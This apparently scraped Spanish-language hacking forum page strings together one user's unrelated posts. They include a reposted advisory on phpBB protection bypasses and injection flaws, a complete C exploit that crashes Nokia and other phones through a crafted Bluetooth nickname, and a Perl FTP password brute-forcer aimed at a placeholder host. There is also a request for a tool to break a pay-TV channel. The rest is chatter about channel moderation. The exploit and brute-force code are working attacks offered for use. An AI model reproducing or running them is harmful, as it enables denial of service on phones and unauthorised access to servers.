Temas

Alguien conoce un programa o algo para rebentar el canal + de la tdt?




saludos.

jeje pues ya va otro mas para todos los phpbbs..

Código [Seleccionar] Expandir

To get rid of possible security problems caused by not properly
initialised variables phpBB comes with the following piece of
code, that is intended to deregister global variables, which were
created because of the register_globals directive. Unfortunately
there are atleast 3 ways to bypass the protection.

// PHP4+ path
$not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS',
'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS',
'HTTP_SESSION_VARS', 'HTTP_ENV_VARS',
'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');

// Not only will array_merge give a warning if a parameter
// is not an array, it will actually fail. So we check if
// HTTP_SESSION_VARS has been initialised.
if (!isset($HTTP_SESSION_VARS))
{
$HTTP_SESSION_VARS = array();
}

// Merge all into one extremely huge array; unset
// this later
$input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS,
$HTTP_COOKIE_VARS, $HTTP_SERVER_VARS,
$HTTP_SESSION_VARS, $HTTP_ENV_VARS,
$HTTP_POST_FILES);

unset($input['input']);
unset($input['not_unset']);

while (list($var,) = @each($input))
{
if (!in_array($var, $not_unset))
{
unset($$var);
}
}

unset($input);

Bypass Vulnerabilities
----------------------

[1] In PHP5 <= 5.0.5 it is possible to register f.e. the global
variable $foobar by supplying a GET/POST/COOKIE variable
with the name 'foobar' but also by supplying a GPC variable
called 'GLOBALS[foobar]'. If the variable is supplied in
that way, the code above will not try to unset $foobar, but
$GLOBALS, which completely bypasses the protection.

[2] When the session extension is not started by a call to
session_start(), PHP does not know about the variables
$_SESSION or $HTTP_SESSION_VARS, which means, it is possible
to fill them with any value if register_globals is turned on.
Combined with the fact (that was even documented in the phpBB
code), that array_merge() will fail in PHP5, when at least
one of the parameters is not an array, it is possible for an
attacker to simply set HTTP_SESSION_VARS to a string and let
the complete protection fail, because $input ends up empty.

[3] When register_long_array is turned off PHP does not know
anymore about all the HTTP_* variables. This means they can
be filled with anything that is completely unrelated to the
existing global variables. It is obvious that the protection
cannot work, when this configuration is choosen.

Additonally to the 3 possible ways to bypass the globals
deregistration code, several not properly initalised variables
were disclosed to the vendor, that can even lead to remote code
execution.

Not properly initialised variables
----------------------------------

[1] Within usercp_register.php the variable 'error_msg' is not
properly initialised and can therefore be used to inject
arbitrary HTML code

[2] Within login.php the variable 'forward_page' is not properly
initialised and can be used to inject arbitrary HTML code

[3] Within search.php the variable 'list_cat' is not properly
initialised and can be used to inject arbitrary HTML

[4] Within usercp_register.php the variable 'signature_bbcode_uid'
is not properly initialised and can be used for SQL injection
of arbitrary 'field=xxx' statements into queries operating
on the user table, when magic_quotes_gpc is turned off.

[5] The same variable [4] can be used to inject f.e. the 'e'
modifier into the first parameter of a preg_replace()
statement, which means, that the second parameter is
evaluated as PHP code. Because the second parameter is
entirely filled with the user supplied signature, it is
possible to execute any PHP code. This can be exploited,
no matter if magic_quotes_gpc is turned on or off, just
2 different code paths need to be triggered.

Proof of Concept:

The Hardened-PHP project is not going to release exploits for any
of these vulnerabilities to the public.
http://www.securityfocus.com/bid/15246/info
http://www.securityfocus.com/bid/15243/info
http://www.zone-h.org/advisories/read/id=8348

saludos.

Código [Seleccionar] Expandir

/*
      Nokia Bluetab Exploit
      Found & coded by Qnix

- This Exploit will creat file called bluetab.txt with your
   bluetooth nickname, send the file to your nokia mobile
   open it copy the nickname and paste it to your bluetooth
   nickname, if any one search and find your nickname his
   mobile will restart .
- this exploit work on many other symbian and java mobiles .

   Qnix - Qnix@bsdmail.org

*/

#include <stdio.h>
#define  tab1 0x09
#define  tab2 0x2E
#define  dot1 0x0A

int main(int argc,char *argv[])
{

FILE *bluetab;

if(argc < 2)
{
   msgm();
   printf("Useage : ./bluetab <nickname>\n");
   return 0;
}
else
{
   msgm();
   printf("bluetab.txt file created with your nickname . \n");
}

bluetab = fopen("bluetab.txt","w");
if(!bluetab)
{
   msgm();
   printf("Some kind of file error!\n");
   return 0;
}


fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1);
fclose(bluetab);
return 0;

}

msgm()
{

  printf(" ------------------------------- \n");
  printf("     Nokia Bluetab Exploit       \n");
  printf("       found & coded by          \n");
  printf("       Qnix@bsdmail.org          \n");
  printf(" ------------------------------- \n\n");
}

/* v1 2005-03-04 milw0rm.com */

# milw0rm.com [2005-09-23]
fuente zone-h.

saludos

Estos dias de vacas me he puesto a programar un poco de perl, y esta mañana he terminado un brute force en perl, os dejo aqui el code

Código (perl) [Seleccionar] Expandir

#!/usr/bin/perl
#este programa va probando palabras  de la lista @letras hasta que encuentra la contraseña correcta.
#este script esta hecho por sikik, bajo licencia bsd.

use Net::FTP;
$username=admin; #se podria hacer tambien en brute force, pero seria muy lento.
$dead=0;

while(1)
{

@letras=(a, b,  c, aa, ab, ac, ba, bb, bc, ca, cb, cc); #si quieres usarlo tendras que poner una lista mucho mas larga.
$posicion=rand(12);
$password=@letras[$posicion];
   $ftp = Net::FTP->new("www.microsoft.com", Debug => 0) or $dead=1; #hay que cambiar www.microsoft.com por el host que atacamos.


$ftp->login($username, $password) or $dead=1;
if($dead==0)
{
die("Contraseña encontrada, el password es: $password");

}
};

bueno pues este post es para pedir que nos den el control total sobre el chan, si solo podemos kickear con el reconectar despues de un kick no podemos hacer na, y eskan no esta ahi las 24 horas..


sal12

bueno pues buscando  info de las  iptables me tope con esto, creo que es interesante os dejo aqui un link

http://debianitas.net/doc/comos/APF/html/apf.html


sal12

en este foro hay opciones para Ver mensajes desde última visita ? es que esta en muchos foros y la verdad es muy comodo:P


sal12

como es que no hay nadie???????????'

se ha cido el servr o algo?


sal12

bueno pos que cada vez hay mas gentuza que entra al canal y empieza a insultar , a poner mayusculas etc... y cuando se les echa vuelven a entrar,  asi todo el tiempo, los opers estan perdiendo el rato con esa gentuza, para solucionar eso propongo que solo tengan voz la gente con niks registrados asi si alguien hace el gilipollas se le banea el nik y listo, que decis?


sal12

pos que veo que se estan cerrando muchos posts los cuales me gutaria dar mi humilde opinion y no me da timpo que ya los xapais, ademas son posts como el de la despedida de koreano( es solo un ej.) que no entiendo porque los cerrais si se cierra un post que yo sepa es porque se hace algo que no es cuento, que puede perjudicar a (el tem), o se portan mal:S y en esos post no he detectado nada de eso.

solo es una sugerencia no os vayais a enfadar conmigo:'(



sal12;